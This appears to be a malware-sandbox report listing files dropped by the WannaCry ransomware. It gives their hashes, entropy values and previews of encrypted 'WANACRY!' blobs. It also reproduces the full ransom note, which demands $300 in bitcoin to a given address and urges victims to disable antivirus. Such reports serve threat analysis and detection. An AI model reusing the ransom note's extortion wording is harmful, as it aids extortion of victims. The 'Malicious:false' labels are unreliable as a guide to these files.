                                                                              Preview:WANACRY!.....]X...#./s.`]p.~>.W....D..7....h.C...k...3-....S.e.s..5.N...&....e......7..B.|.M.......Z...(.A9.G..)wJ....?..^.K..0$I...."..M0a......lL..G....o...:<3f.B..L...BB.O....W.......LWA..3.i.U6.`.X...u.....A.?........<.[Z.Q......m.z..v..d.gs:...|l..............C.......E.......jK..G...b.G"5.:?.k.Y....K...*.........R..B.@... ...R...d...){>'-#].&...y&......4.1....}......./.1."..pW".{.>}f$.`RB.i..nK...Ms...e..>...^I'.V..^.&......1_.l('._j....ti....t.....s..5x.t>......h,....f..ukK....Qhx...}..s..Um.....e.v......8.H.~7x.G...9..}...?.)W2X.....\.5...'W.x|..GY.#Q...r9.....e..4.=..V..}......f....@..@...YG...O..K3<.... "6.b....>0...?/.-...GK..N...;.....3.2?.Q.mQ.........t[N..p....6.S..."..U..F1sl..Y....).I..,M.....ka{N.........Z.K.o..Y...l.z-...x)M..._..`.S...(PVEf.P.p.C|,..$...L..G...3...fY..*.|9..hF.......}....<..D...KO....}.We.J.mz...)...x.._.w~..i.i~.. ..b.].=.D...u...~.K",..)..E...j..........u...`.C...D...=n6....&`:@..........u
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):933
                                                                              Entropy (8bit):4.708686542546707
                                                                              Encrypted:false
                                                                              SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                                                              MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                                                              SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                                                              SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                                                              SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                                                              Malicious:false
                                                                              Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Oct 4 05:43:20 2024, mtime=Fri Oct 4 05:43:20 2024, atime=Fri May 12 05:22:56 2017, length=245760, window=hide
                                                                              Category:dropped
                                                                              Size (bytes):577
                                                                              Entropy (8bit):5.1553023194242416
                                                                              Encrypted:false
                                                                              SSDEEP:12:81ypzYNbVUthZsUoBjAuvUuHwoOXhicmV:81BImAO96Fm
                                                                              MD5:9B3A32817BC73D079076C7A433BFD223
                                                                              SHA1:ECB0EAF1C2D33A065EAD7E1CC26B1293BB2BC7A7
                                                                              SHA-256:12F9DBE08D1AA086B674A0CFFAD10F11FDC79664CBF5139B9B609D05197228B5
                                                                              SHA-512:CD59012398BA9D25D19F76689222451A32A13D1A79CFEB7B58ED152F121A180CC3A10283ECB32922DA99F162972E0D50CF1C28061D35A11130DFE82B4EAE5702
                                                                              Malicious:false
                                                                              Preview:L..................F.... ......(...c4.(....`.1.................................P.O. .:i.....+00.:...:..,.LB.)...A&...&......}}.9....7.(....&..(.....t.2......J.2 .@WANAD~1.EXE..X......DYk5DYk5..............................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y...........s3.T.....C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......066656...........hT..CrF.f4... .F..F...../....%..hT..CrF.f4... .F..F...../....%.E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.838258265099937
                                                                              Encrypted:false
                                                                              SSDEEP:24:9Y5NFJ1dJmEuY9C43sEj2h0GDGM7vTcCj:W71d5C/feGDGo9
                                                                              MD5:5F8C8AB1BE5CCB090400A090C85DBC58
                                                                              SHA1:751CCC049441F9F287C68D1FFB9A4EF6A8CD63E4
                                                                              SHA-256:378E50BFDCF4F639CF5DADECA60D4F9E47355B9FFBCACA6978C7A1422EF84AFF
                                                                              SHA-512:32C3A2915769917770E70BB5F176C0BC50DC4D0148489A428931C741C181BE5270FC8D20B39FCF4BBBC6241A0AC74492AF54335A9E267D5B834B6797AD01B436
                                                                              Malicious:false
                                                                              Preview:?9..q$Uw.EQd...6!Uj'#VJ.M..&.u6.R.R.qV.l.....Y<).'.......5.#fv..E..\....H,.Zp[.liO(?Y|.G..D,$H?I3.'.........s...m!.F.c.":. ...%8;..[.....s.Z?...tlT.T|.%...`b.......s....d..R&`....o...e..?.F.H.A..7...........4.E.9...Wb.Hm".....M..{M.......?...IY.:.{...0..8.%..........U....1?..\.....=.0}5|M..;. ....x^&....s.....R.....[......#.bx4..>.G(...b.x.E!..wt...V....n....B.@Ct....c...(j...<B.B..p...<.z.l>.....?.\.$./.9L=I]y...\.{."........<.)?.Gp...T].Jv.;..Z...4.ZB.j....4..a?(..R<.~]-.....I.Y.sH.MCtUn.W.+A3.2...?....H.On...(..'C.....p=.j_..O.....g..5D2A.I...s.P.zb\.'.............`.......]VC.:.....hBv..Da..k....SP....8..iF#U].+..........'.!.-..=.......S...l.a<.{..8[.n7a .K/..!.'....8..*9A.....E...+...........$..L...b.!Q.P.:....d.....AM...e.]8C.[...t[..F..Z._.J.....0.9p~..[...8F....A$.....wk..7e .}k..w.C.....T:.xF../X.z..^}|..b.0.".4...M.h.}../...9.!.h.U3c..8.Jk..1f...,1.W/..-Tu?sT...i@Y .f.e.P...r.gs...j.R.z..1...{..@B...qc5d.zw+.P}.c:.h.FH.\
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.830325821141218
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkGII/AFS2ICzkq3eIMWCQzB9Db/C9v71/cKWkkywpd0zIkDlSmEQD2/tVdh8Z/:bkGIlF8NIMUv/CPokktpdKppFE2QtVdI
                                                                              MD5:F3E74CAB11717E6A6D14084F9D551F08
                                                                              SHA1:9D00DBC3C3954F7D697FE4549D6951C78C6CF8B6
                                                                              SHA-256:E6BE9D4284BD9A5F612FDD0511D2913DC697539A3C24EBC647DBC495E29920C1
                                                                              SHA-512:13279DCACA092C44F0C05D0BAFDA62A456CD67F330E9FA6E1E2349BDD57C04284E36A07B1657D342B948D23C347D543186C757EDF6FCCD4EBD61DFFFBD1B96C2
                                                                              Malicious:false
                                                                              Preview:WANACRY!..........u.?jnT|.3..W.3.m....f 4....c>qi..ugR..Z'.w../Wn.x.f.uc..n.C..N....&...Vo.........."..wUZ...X..].3..0[.5u-..+.F.D.......u.;bd.....U9bS.?.XIs.}...W=.G.KM.r.l71...u..h.7Y@.$..D..m..%.....i..%..&.3=.i!J.i.&..B..G.x.E...9L..,.<.$...`R.&....ky...............1.....D....W..4.].C...J.C..c.....{..>k..\.a^...{Y@.0..`%i.. .&.)..g^.<RKt.R.lQ...c....8......F.k........P........-..'..f.]J.......w7...zv(.n..s.w....|z..:.V.].k.!.|.Ril&...`......]w........^{.................49=.E.j.N722!....M.|.S..B;..X....J.(............^s.E..~.HI.".2......Z.<UN^.QV.|...n.n7..i......!.Z.<..U&...Ew}.{..v..qJ..|-....6E.U..|...~.....uPLM......b.z...p.4Y%...(^...[.hG9~........5;4Y.&.ZZi.....]Cv.p/.HV^..2.x.c.....F6;..D.Vi..?K...U6a$.....Z..>...A.Vg......Y...n....b....9k..3...T75....V@,.....{.}..r.<......b..X...D.....J..O..........Sc ..........H.eH..Bv.....c.%L....'..f.......t3V.._....K4.*o....G~..{.E.g.C..;.(...u.M#..gxL.4.....Tt;.j.....(...H.!v..FF...c.l/.7....
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.830325821141218
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkGII/AFS2ICzkq3eIMWCQzB9Db/C9v71/cKWkkywpd0zIkDlSmEQD2/tVdh8Z/:bkGIlF8NIMUv/CPokktpdKppFE2QtVdI
                                                                              MD5:F3E74CAB11717E6A6D14084F9D551F08
                                                                              SHA1:9D00DBC3C3954F7D697FE4549D6951C78C6CF8B6
                                                                              SHA-256:E6BE9D4284BD9A5F612FDD0511D2913DC697539A3C24EBC647DBC495E29920C1
                                                                              SHA-512:13279DCACA092C44F0C05D0BAFDA62A456CD67F330E9FA6E1E2349BDD57C04284E36A07B1657D342B948D23C347D543186C757EDF6FCCD4EBD61DFFFBD1B96C2
                                                                              Malicious:false
                                                                              Preview:WANACRY!..........u.?jnT|.3..W.3.m....f 4....c>qi..ugR..Z'.w../Wn.x.f.uc..n.C..N....&...Vo.........."..wUZ...X..].3..0[.5u-..+.F.D.......u.;bd.....U9bS.?.XIs.}...W=.G.KM.r.l71...u..h.7Y@.$..D..m..%.....i..%..&.3=.i!J.i.&..B..G.x.E...9L..,.<.$...`R.&....ky...............1.....D....W..4.].C...J.C..c.....{..>k..\.a^...{Y@.0..`%i.. .&.)..g^.<RKt.R.lQ...c....8......F.k........P........-..'..f.]J.......w7...zv(.n..s.w....|z..:.V.].k.!.|.Ril&...`......]w........^{.................49=.E.j.N722!....M.|.S..B;..X....J.(............^s.E..~.HI.".2......Z.<UN^.QV.|...n.n7..i......!.Z.<..U&...Ew}.{..v..qJ..|-....6E.U..|...~.....uPLM......b.z...p.4Y%...(^...[.hG9~........5;4Y.&.ZZi.....]Cv.p/.HV^..2.x.c.....F6;..D.Vi..?K...U6a$.....Z..>...A.Vg......Y...n....b....9k..3...T75....V@,.....{.}..r.<......b..X...D.....J..O..........Sc ..........H.eH..Bv.....c.%L....'..f.......t3V.._....K4.*o....G~..{.E.g.C..;.(...u.M#..gxL.4.....Tt;.j.....(...H.!v..FF...c.l/.7....
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.789149180537311
                                                                              Encrypted:false
                                                                              SSDEEP:24:N0nmFpkkNJy4B9rNGuPHwLjDWywr7EZ7o8n8Jqnc/ZKwD:NWskkN84z5xQLj1Y7EZ778JxowD
                                                                              MD5:EFFB3D2D54989CAEE7619C24978CFD7E
                                                                              SHA1:D0B42BAABEAA27431BE577641684B2E66A6C8A6A
                                                                              SHA-256:D2D186CEBDFD2DDEB05DCD68E0884F7E56DD4B25FE23E6BF556D6E12A818B595
                                                                              SHA-512:18278A2FE03CBEB5DBDB44331F4E568F64840110EC60749782636C8FA7B258381D07F4036FE6603945D4E63042B3405A8D092328A4B0D7F9174350B1CB547D0A
                                                                              Malicious:false
                                                                              Preview:...w...Xg'.g{..I....d.......g_.U.^..>q...Q.."...............b)......5.....E..Z....t^...[we..n`.c...4h.I7.A1DWI..f,S...GA.~....INS.."...er.'....r.?......8}.....&..a=.hL...G...BF.......W.v..4.yhq&.{..M4.lj..)."A.A....f.l.3...+..U{.&.''..mN!q.......#....N...N....i._...+N...7.^.\....2..>..]..,....@...*.F.R.....%8..A...<.r<?.4.x...&.O.Wd...7......&..../@..3,..u..n...-...9..@..3..%...b..|.D........8?.I.3.....lpQ..v(. ......+.!.7..1..T5....v.;.......:. ......#R\D.....*.P.>@.T........>...@Uj.)..l[.R.....Tp....I@......@....]<.. ...'.z\.....FjvD..... .Ww..z.j.'..M \.?X.fA....h..+..X{4A..2l&M9.qD...................1..&.j.....[..E.f....$.GMi...J.3.t....S.R.@.>r..#9K,IF!W.s.X......=.>.&.....cl.A..'...4o... .*.gYe.r1gtL.(..:.e...7...0.R...v......IOT<,.u+.@I.N.s?@.2.{._.....c,.....,...n..Z...7..!e...K.`gz.:..R..B..A..;.....2....W[..D.........MKE+.2P...dQ..}...^..!....J..|.T....8;1...2.7R....<...k.iO.l.p.T.4....$[sq.. .8B..$.7....i.....:a.T....
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.85702399908982
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkdd2oErNjmxfRu9J+L4pf8gUyZApBhZhhIf8bYUorEbybZ5JBzGz9hC2Z6KzMb1:bkPNrM9wLIf8qy1ZDhUNdl12zMM4Xx7
                                                                              MD5:C240F89B8F3E6751A694A981F94BD75C
                                                                              SHA1:F98FFB8ABCC938ADFBBF20E6F0FA20A2DEA52E76
                                                                              SHA-256:0A0DB213B34062E0C7EB620BAFF0F33577A370E17662D35CD9148258AD716684
                                                                              SHA-512:D75F998DDAB9633E2817C82C06FDFCDCE2CE8C28159571D1642FB62E4A71CEDB6FE23E79DAE7037A397E098542EC0390E352F8AF13B5778FD65FA59FEB7C1F1B
                                                                              Malicious:false
                                                                              Preview:WANACRY!....Qh!..."./.c4...*y.x...b..u.../.}..V....T.U.......7...H..z."d..4...s.......~ ...;\.......eg..jk.*.mGq..u.....W...&..m.......D..)L.0.e...p....\..].1s/...TY...JK.+z..6.....0.G.Y$.u....NlW.D....E3..H..|Q..([.......`....h}...eo.7<i...Ma..._$..............F...4.....i..7..u.1.7R.o.o.[.9...fw.0$..~....=......E...0^.;..3.L..L...R.C.l.;.s.t.l.U..V,$.N.T...x..k..i1..Qm..n.I...Eg......L7T....*:+2.......WL.;...1.v.@......nOWI..<..\B{..n.|/..<....E.}.....$E...UO.^...M_.S...p...r.<A.9<....N..C.f..,..8...y.P.K=.O<......T@...:rY.........tlBd...O..i.GXt...0...D.K.7.wK.3......{t]{.K(..R..Z.I.|.G|...A#....V.H...7$.@w1..@....D..%....2.m.Hy./.s9^.b..r..@@M..a.]..)Q..j..{..>..m......?s.g..Z..8......+.:.:f.N..\b.k..,...f.-.>.4J.D....yG'+,.....6.....a..-i..\SyK..pyQ.......?}.&.v......7m..ptUf..BJ+L..C.L..s8K...Gk.".?.......RSe.=. .Z....c..Y)...;.4.g.u.o..V...C.....D..9E.....]..l.y6h.O...:......R./ay....s.$P...z.....Io.~...N..Z..[Z...Luw=|.J...!..f
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.85702399908982
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkdd2oErNjmxfRu9J+L4pf8gUyZApBhZhhIf8bYUorEbybZ5JBzGz9hC2Z6KzMb1:bkPNrM9wLIf8qy1ZDhUNdl12zMM4Xx7
                                                                              MD5:C240F89B8F3E6751A694A981F94BD75C
                                                                              SHA1:F98FFB8ABCC938ADFBBF20E6F0FA20A2DEA52E76
                                                                              SHA-256:0A0DB213B34062E0C7EB620BAFF0F33577A370E17662D35CD9148258AD716684
                                                                              SHA-512:D75F998DDAB9633E2817C82C06FDFCDCE2CE8C28159571D1642FB62E4A71CEDB6FE23E79DAE7037A397E098542EC0390E352F8AF13B5778FD65FA59FEB7C1F1B
                                                                              Malicious:false
                                                                              Preview:WANACRY!....Qh!..."./.c4...*y.x...b..u.../.}..V....T.U.......7...H..z."d..4...s.......~ ...;\.......eg..jk.*.mGq..u.....W...&..m.......D..)L.0.e...p....\..].1s/...TY...JK.+z..6.....0.G.Y$.u....NlW.D....E3..H..|Q..([.......`....h}...eo.7<i...Ma..._$..............F...4.....i..7..u.1.7R.o.o.[.9...fw.0$..~....=......E...0^.;..3.L..L...R.C.l.;.s.t.l.U..V,$.N.T...x..k..i1..Qm..n.I...Eg......L7T....*:+2.......WL.;...1.v.@......nOWI..<..\B{..n.|/..<....E.}.....$E...UO.^...M_.S...p...r.<A.9<....N..C.f..,..8...y.P.K=.O<......T@...:rY.........tlBd...O..i.GXt...0...D.K.7.wK.3......{t]{.K(..R..Z.I.|.G|...A#....V.H...7$.@w1..@....D..%....2.m.Hy./.s9^.b..r..@@M..a.]..)Q..j..{..>..m......?s.g..Z..8......+.:.:f.N..\b.k..,...f.-.>.4J.D....yG'+,.....6.....a..-i..\SyK..pyQ.......?}.&.v......7m..ptUf..BJ+L..C.L..s8K...Gk.".?.......RSe.=. .Z....c..Y)...;.4.g.u.o..V...C.....D..9E.....]..l.y6h.O...:......R./ay....s.$P...z.....Io.~...N..Z..[Z...Luw=|.J...!..f
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.817601343965613
                                                                              Encrypted:false
                                                                              SSDEEP:24:dMa0gPmS84RyJf22Ijbz4/3a1nOYkkJsOz2ZhD21WDRE6mD7PA:e+PmSX4Ju2/qSusHC1GilPA
                                                                              MD5:D6CEB8C298B67469500743CC40B46601
                                                                              SHA1:F5B5A6A020B660A6CBFC826C36840251EF343C40
                                                                              SHA-256:D9A9BD8F54A947F7108CD35A03E159D6A947D1B9A94FA890C10B7543F70C0E08
                                                                              SHA-512:88994EAC4BB3F702C9BFDE755054AF253D24E664D2D3D42633D1FECEDE318B28AEAE9E64C2940F6F4A747676A1EE94DDEF6631DD71F31B48AD19481F89A9AE24
                                                                              Malicious:false
                                                                              Preview:../o....{u.......[..EQ].j.:F&\..*...b/H.].um.@.e7u..n4g^.^7U|.........{l..u.G'f.Na...T..-...};.8.Aw.1...D.=.U9....c.@.{#.F...zAW} 3.1..|ZC...\..K.i..e... jv.\.u#I..|{...>..6Nt.MO..h....V.O}...B_7O.C....>;...Yv...T.&$.?..-...l..w.hS.O.[lh.K9...#...t..I..2Ap..r......&....{.....A..z....k&..B3...i)...W...$._).. ..A;./.....$.d.F.,.(>9`...2............%.y...E.....<..d.]tp.8.%[.E6LV.\...'......=.`E.\A=....5@8k.......g........i.%.2Xv.].?v_.,~.N...?.g..Vca.F5i..M..k.40>...x..V..........D.\.@.d.h.H....:1.{.......x>..n...O.iT.."na>...lG.ij........J....Yg.k.@S..%P ..rO..Q.t#D|q.y.H....F.@..l.6WX.Bv..x..Cc.;Zd^Kvm<w..V.....C......9=........L.S..=B...1r..n&......).....K.}.p..AX....P.!)./9.8.txr...'.#...P.f.C.*S8..{...(..-s...N..E..........Y....b.>X..3Z....U+a.z..k...=JH*.v......1.o....P@W..u|..6..Q.4..\......Ni..H..^...d}M.W.(......z.7.P!.E...}k.y.[.z.J.]:.....x7.4'.7..l..s.Q.49...[....Tk..U....:^>.A.5...A.a]...:..5..qUl.o.m(..lsh..G./..Vz*8.#oD....#....}
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.847470495247003
                                                                              Encrypted:false
                                                                              SSDEEP:24:bk9Y5bNTbthp+gtAM7acTcfl3GqM/BlLqm1xUPBcZLDHbtlbsiGnkbtobp2n:bkaRNLwgGM7aicfjM/7LoPBcx7rQLkbN
                                                                              MD5:BAF1763FC4E8A96F0FA3BDA2B7FE62BB
                                                                              SHA1:BF43CB1D51CD03A84DD1C2B8CFA0A2A9A3117A70
                                                                              SHA-256:A58874946C76DA481B871BC70E53CDBE0396A5F2A4888B1BF206D64BEE00D1EE
                                                                              SHA-512:F6EC2BEF533BEFDE06447F284B14E8188CD6CCE3B044E76C3DD2F2CE6632E6EFF3B6FFF4DB2CFC873C3EBEA1FDD4F13AE2008E68E5C6098461A82246770CED93
                                                                              Malicious:false
                                                                              Preview:WANACRY!......vA.e..{..y.'Vl...+.*.&.4...ni...Je...KSe....<.t.ei.."..,..$...(.Q.4uxo....BNN...#...T......Z.[.5G...9.f....B..X9..O....X$.............qL[....3.$8..s.c7.U.;Zp.r.r.V.?.i0L.a..[.+.2i^..u.VzNt.7Gv\-..Fi...B..{....pv(..}",.j....5sf......>..>............w...Z...U.$.}.5VZRN^._.../..........I..*.....F)t<..b.[,<g..v.Z.....,...........c#.f...CU.K..2..t...+2..D..G..hXbJ.....S.Fh:.7>{{.Y.n..&J$.U&............q....z.`...(..j..r...G.|Cn..R...-g.....`&!...n....(..j..&S...F.=mxn.M;5.......{...b.\..K..[f6eSs..1&.d..d.......(.v....r.......J..Wq..n[.......,1J...A#..f.M.W.Q.{+.3,l.....@....b..?.}..%R......{$.Q.M....|..t.W.<.Z...3g:.>..v......2.dc.UU..{..S.WAB..r.-R.c.V;..^Dob..../jV......Ku..N.yP.O..o>O,Z...vO*......,t/l.>Q..h...p.Vs.}.L..g..hg.U....E.s.%oo...cpG..?.........M..:-.....c....$(![....!^.x.j..Sm.....l.@...`.q.hN..<.....6.-..Cf...=.+..k...D..V.9..>zs..:}.;.g. .B.<..!u|A2....`.n..:h....rM/3..D.y.]Y....bj1.!8...s......K.n.{...TfO
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.847470495247003
                                                                              Encrypted:false
                                                                              SSDEEP:24:bk9Y5bNTbthp+gtAM7acTcfl3GqM/BlLqm1xUPBcZLDHbtlbsiGnkbtobp2n:bkaRNLwgGM7aicfjM/7LoPBcx7rQLkbN
                                                                              MD5:BAF1763FC4E8A96F0FA3BDA2B7FE62BB
                                                                              SHA1:BF43CB1D51CD03A84DD1C2B8CFA0A2A9A3117A70
                                                                              SHA-256:A58874946C76DA481B871BC70E53CDBE0396A5F2A4888B1BF206D64BEE00D1EE
                                                                              SHA-512:F6EC2BEF533BEFDE06447F284B14E8188CD6CCE3B044E76C3DD2F2CE6632E6EFF3B6FFF4DB2CFC873C3EBEA1FDD4F13AE2008E68E5C6098461A82246770CED93
                                                                              Malicious:false
                                                                              Preview:WANACRY!......vA.e..{..y.'Vl...+.*.&.4...ni...Je...KSe....<.t.ei.."..,..$...(.Q.4uxo....BNN...#...T......Z.[.5G...9.f....B..X9..O....X$.............qL[....3.$8..s.c7.U.;Zp.r.r.V.?.i0L.a..[.+.2i^..u.VzNt.7Gv\-..Fi...B..{....pv(..}",.j....5sf......>..>............w...Z...U.$.}.5VZRN^._.../..........I..*.....F)t<..b.[,<g..v.Z.....,...........c#.f...CU.K..2..t...+2..D..G..hXbJ.....S.Fh:.7>{{.Y.n..&J$.U&............q....z.`...(..j..r...G.|Cn..R...-g.....`&!...n....(..j..&S...F.=mxn.M;5.......{...b.\..K..[f6eSs..1&.d..d.......(.v....r.......J..Wq..n[.......,1J...A#..f.M.W.Q.{+.3,l.....@....b..?.}..%R......{$.Q.M....|..t.W.<.Z...3g:.>..v......2.dc.UU..{..S.WAB..r.-R.c.V;..^Dob..../jV......Ku..N.yP.O..o>O,Z...vO*......,t/l.>Q..h...p.Vs.}.L..g..hg.U....E.s.%oo...cpG..?.........M..:-.....c....$(![....!^.x.j..Sm.....l.@...`.q.hN..<.....6.-..Cf...=.+..k...D..V.9..>zs..:}.;.g. .B.<..!u|A2....`.n..:h....rM/3..D.y.]Y....bj1.!8...s......K.n.{...TfO
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.777117489980487
                                                                              Encrypted:false
                                                                              SSDEEP:24:jsmm6c0OLCBB83/5p9KxxQYHs1Vh9Ju9E1ahP5yUE:F602CIFKzQYHO9/AhP5+
                                                                              MD5:C61EE02DEEA57827DA67C1D4FE563E07
                                                                              SHA1:461137EB69D9829546853581C29E0D3A4323D6C8
                                                                              SHA-256:F887B542009994840775984B11E30C8ED303A67A342491F35FFAC258A9DE301A
                                                                              SHA-512:CA38CF6B37D044025DE0CD2A1473B5ECAFC0F23F35772C94B387310250BE3DFB4826683B928F16BFBB62515DFF40FD35B3890B96D39BDA4B5B4A7ED621A1AABD
                                                                              Malicious:false
                                                                              Preview:.MnI>....o..i>P..d..o..,._...u.I...0..........c...'/.G+QN7..v...3E..?....~[..L.....F.UC"..T...*K.J..3*...T....!.=..v...%.mIOm....R.(.....q..t.`.7.t.......z......x.D...+.T.!~q.C..L.....,........#..FM.==........By].l.rn....I\C.:.+...=.I..5....9z.uhS.P..u.......|z.y..K.+....t.>q(Zcw..aX......VoQ._\....q.e-j...M..Z.^g2..G@;.bQ..t]..G.[.4.B.0....^zy.. ..%..3.....;..r....e.Am.JG..y..H.D.juj.o.2..$_.....C...B.0.....1...\.rv....MDTM.....n~.[y.Z~n^L..I....;Fz.&~<...>P.S.....M..l.`.>N.....VU. ..[..XyR)j.x=.=.1.......Sc....l..[..MZ.......M....q.,..^Mi....~?....wi!.J.*.o.P..Z...4.C0U>...h\..-.....x...-..;r...........ck.GRC<A...-Y[:{5. a..l"}?.e_=...U.s........[.y...PD*FQ..F.^P... ...y.x....-.W .nIbm;.4.......ze.h....(..+...*.!..K3:T.>`s..+.N.qgk.B..9.......<@.^..M`..K..<..].0K............r.$...+.5m..H.u.4TG... ..7G..rs75'.^LfL+x....S.?.)......*P.p..F."..V.rI..5x:.......t.<.t....5..........]4#...c([.p`8.~..'..w.u.&..._..........}.:e.F.......4
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.8366154213927945
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkTYd6iLc3snN4Ey3wfaGV2G6PUHptbGZENjNRCVXXYdImFhvtpvWpBlw9TG:bkTYApRzyLV2CJE6NgXIuAVAai
                                                                              MD5:0E9D9152AA0EEC757AF4ED915BD20121
                                                                              SHA1:7FC68ED7B56DB6DE63D69EC06B3AEF3F5162EA0C
                                                                              SHA-256:344DE278AC07D536B606C0B6F2AD3621F17FB93E2B3DF080B339EF09F29ECC23
                                                                              SHA-512:F45C6787628076012F2103152C2C60B8156DCEEBF7E741BE155F3F116BE0F8515BAEA6B176F6B05A98BAD8B9C200DC7AA47EFA81345F34BFDD0BBF1CB6F8B136
                                                                              Malicious:false
                                                                              Preview:WANACRY!....bEo2.....n6......)7.m....:(.V.&..i.Q..\.Q....c....u....\.....w.@..%..]h...`l.../...Y|../Y".J..(..YYs.Q..pH?./.3..#^......^k=.hP..f.P...V.R0.#.".....)..T.@........BY..bV^.d;9...7..,.N.n...'.7 .3..#..cDA...{....v.z.J...IAP.F.......s(....u................!.1..bB.%..4....W.Xp(i.....d.l.r.5.Q....+&...k.~T....Z}..eD..l.r...Jl..d........;.T.{.2r1..y.....p......UM.....Y..N...;4i....OI5.'.PE..0d.....&..%.K%...7.(......oh....[.gA=G..j.....N..V`...1.".K]...i .v....B..@....SW@JM6.......p......\IF....u..s.F....=<T)a.x,..N..-k}@....e:...cJ..E...!.G.a..n.4D9n|Q....f\.2.%(..tJ..u:.[........}k...>3.\.)N.N....d0.Oo.C"WMrj.`CX......W...L.Nb.a....+..*Y./\.......V.vM....J.7.MDo.9.r.e..%...X..t.&..D.H.j.]........l.|....O.i..l."..?H..os........7.0.a..j.........oW...?.......mu.v.7......._.S...g.2.........+......#.Np.....i~eNY....$..Y%..b.HT.q./..@.Zz.`.g..l..0>%@...GHev}.q....6.....G.:....r.{......M.W.h%?o_.6_..z...N.p$:0.....1|..Co....s.....
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.8366154213927945
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkTYd6iLc3snN4Ey3wfaGV2G6PUHptbGZENjNRCVXXYdImFhvtpvWpBlw9TG:bkTYApRzyLV2CJE6NgXIuAVAai
                                                                              MD5:0E9D9152AA0EEC757AF4ED915BD20121
                                                                              SHA1:7FC68ED7B56DB6DE63D69EC06B3AEF3F5162EA0C
                                                                              SHA-256:344DE278AC07D536B606C0B6F2AD3621F17FB93E2B3DF080B339EF09F29ECC23
                                                                              SHA-512:F45C6787628076012F2103152C2C60B8156DCEEBF7E741BE155F3F116BE0F8515BAEA6B176F6B05A98BAD8B9C200DC7AA47EFA81345F34BFDD0BBF1CB6F8B136
                                                                              Malicious:false
